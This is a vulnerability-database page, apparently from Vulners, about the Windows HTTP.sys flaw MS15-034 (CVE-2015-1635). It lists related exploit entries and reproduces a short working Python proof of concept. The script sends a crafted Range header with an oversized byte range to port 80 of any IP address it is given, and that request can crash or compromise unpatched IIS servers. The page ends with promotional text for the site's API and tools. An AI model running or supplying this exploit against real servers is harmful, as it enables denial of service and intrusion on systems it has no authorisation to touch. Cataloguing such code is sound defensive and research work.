| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
| Microsoft Window - HTTP.sys PoC (MS15-034) | 15 Apr 201500:00 | – | zdt | |
| MS15-034 Microsoft IIS Remote Code Execution Exploit | 19 Apr 201500:00 | – | zdt | |
| Exploit for Code Injection in Microsoft | 20 Oct 202511:22 | – | githubexploit | |
| Exploit for Code Injection in Microsoft | 20 Jun 201814:28 | – | githubexploit | |
| Exploit for Code Injection in Microsoft | 15 Apr 201515:05 | – | githubexploit | |
| Exploit for Code Injection in Microsoft | 27 Nov 202010:59 | – | gitee | |
| Exploit for Code Injection in Microsoft | 25 Nov 202023:04 | – | gitee | |
| Exploit for Code Injection in Microsoft | 17 Nov 202009:07 | – | gitee | |
| CVE-2015-1635 | 14 Apr 201500:00 | – | attackerkb | |
| The vulnerability of the Windows operating system allows a remote attacker to execute arbitrary code within the system account context. | 7 Jul 201600:00 | – | bdu_fstec |
#Tested on Win Srv 2012R2.
import socket,sys
if len(sys.argv)<=1:
sys.exit('Give me an IP')
Host = sys.argv[1]
def SendPayload(Payload, Host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host, 80))
s.send(Payload)
s.recv(1024)
s.close()
#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
SendPayload(Init, Host)
SendPayload(Payload, Host)
# 0day.today [2018-04-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation